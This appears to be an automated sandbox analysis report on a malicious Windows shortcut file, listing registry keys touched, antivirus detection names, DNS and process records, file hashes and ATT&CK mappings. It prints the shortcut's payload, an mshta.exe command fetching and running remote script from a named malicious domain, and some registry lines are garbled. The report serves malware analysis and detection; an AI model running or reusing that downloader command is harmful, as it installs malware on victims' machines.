HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x6e08\x160EY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
"C:\Windows\System32\msHta.Exe" http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
!IECompat!Mutex

Flags

Icon ..\..\..\Windows\System32\cftmo.exe
CMD line http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e
Icon %SystemRoot%\system32\SHELL32.dll

Windows
System32
cftmo.exe
C:\Windows\System32\cftmo.exe
%windir%\system32\cftmo.exe
1SPS0
user-pc
Windows
System32
msHta.Exe
#..\..\..\Windows\System32\cftmo.exe
%windir%Ahttp://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e!%SystemRoot%\system32\SHELL32.dll
%windir%\system32\cftmo.exe
cftmo.exe
Application
S-1-5-21-2108907110-3666731302-1928028421-1000
System32 (C:\Windows)
C:\Windows\System32\cftmo.exe

Full Results

Engine Signature
Bkav Clean
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0443ACBC
CMC Clean
CAT-QuickHeal LNK.Downloader.37267
McAfee LNK/Agent-FSDJ!120E3733E167
Malwarebytes Clean
Zillya Trojan.Agent.Script.360339
SUPERAntiSpyware Clean
Sangfor Malware
K7AntiVirus Clean
K7GW Clean
Arcabit Heur.BZC.YAX.Nioc.1.0443ACBC
Baidu Clean
F-Prot LNK/Trojan.ICHT-34
Symantec Trojan Horse
ESET-NOD32 Clean
TrendMicro-HouseCall TROJ_FRS.VSNTD720
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Nioc.1.0443ACBC
NANO-Antivirus Clean
ViRobot Clean
Tencent Win32.Trojan.Agent.Auto
Ad-Aware Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos Troj/DownLnk-X
Comodo Clean
F-Secure Clean
DrWeb Trojan.DownLoader33.28040
VIPRE Clean
TrendMicro TROJ_FRS.VSNTD720
McAfee-GW-Edition LNK/Agent-FSDJ!120E3733E167
FireEye Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft Heur.BZC.YAX.Nioc.1.0443ACBC (B)
Ikarus Trojan.Agent
Cyren LNK/Trojan.ICHT-34
Jiangmin Clean
Avira Clean
Antiy-AVL Trojan/Generic.Generic
Kingsoft Clean
Microsoft Trojan:Win32/Casdet!rfn
AegisLab Trojan.WinLNK.Acbc.4!c
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
Avast-Mobile Clean
GData Heur.BZC.YAX.Nioc.1.0443ACBC
AhnLab-V3 Clean
ALYac Trojan.Downloader.LnK.Gen
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
Qihoo-360 Generic/Trojan.066
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.1.4 51228 1.1.1.1 53
192.168.1.4 51819 1.1.1.1 53
192.168.1.4 62350 1.1.1.1 53
192.168.1.4 137 192.168.1.255 137
192.168.1.4 51228 8.8.8.8 53
192.168.1.4 51819 8.8.8.8 53
192.168.1.4 62350 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.nrots.net [VT] 185.163.47.134 [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Process Name cmd.exe
PID 5204
Dump Size 302592 bytes
Module Path C:\Windows\System32\cmd.exe
Type PE image: 32-bit executable
PE timestamp 2010-11-20 09:00:27
MD5 ac44491d412ecd2a77fb9fd5fa299620
SHA1 29dbef220f37fd8afe82de54fbcd99d4df1ddac3
SHA256 b35ac1bcb58e44c2df5162b4c3e2e1d6b14a5dceef6133177a498eb5dafaf891
CRC32 500C1102
Ssdeep 3072:OJutMJ3KZliSK3TswJTJZTbsyxKNT4jwpt0qMYk2jyGez1c:O4tg3p3PVPHPxi4m0qMYk2mt+
Dump Filename b35ac1bcb58e44c2df5162b4c3e2e1d6b14a5dceef6133177a498eb5dafaf891

Process Name mshta.exe
PID 5952
Dump Size 13312 bytes
Module Path C:\Windows\System32\mshta.exe
Type PE image: 32-bit executable
PE timestamp 2013-10-14 05:50:08
MD5 eda52e9186cbe58e639ddfa26b67089b
SHA1 d477f56351a42bf58977c0e73497a958b4f8a1be
SHA256 1abc16ef77d4f5aa0e884c1f29ea0487e035da4d534e516c1b73a4ef0b99db81
CRC32 F2D65049
Ssdeep 192:WVHLE1moNa2pTL3YiweO+T1MYDJWwelJIRBU:WT92tLI3lsWw6
Dump Filename 1abc16ef77d4f5aa0e884c1f29ea0487e035da4d534e516c1b73a4ef0b99db81

Defense Evasion
  • T1064 - Scripting
    • Signature - script_network_activity

Execution
  • T1064 - Scripting
    • Signature - script_network_activity
